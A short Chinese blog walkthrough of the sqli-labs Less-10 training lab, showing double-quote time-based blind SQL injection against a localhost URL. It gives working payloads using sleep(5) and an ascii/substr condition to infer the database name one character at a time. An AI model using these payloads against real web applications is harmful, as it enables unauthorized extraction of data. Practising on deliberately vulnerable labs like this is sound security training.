当前位置:Gxlcms > 数据库问题 > 【sqli-labs】 less10 GET - Blind - Time based. - Double quotes (基于时间的双引号盲注)

【sqli-labs】 less10 GET - Blind - Time based. - Double quotes (基于时间的双引号盲注)

时间:2021-07-01 10:21:17 帮助过:20人阅读

这个和less9一样,单引号改完双引号就行了

http://localhost/sqli/Less-10/?id=1" and sleep(5)%23

5s后页面完成刷新

技术分享图片

http://localhost/sqli/Less-10/?id=1" and if(ascii(substr(database(),1,1))=115, 0, sleep(5))%23  

技术分享图片

 

【sqli-labs】 less10 GET - Blind - Time based. - Double quotes (基于时间的双引号盲注)

标签:div   blog   sql   class   tab   com   sed   sleep   刷新   

人气教程排行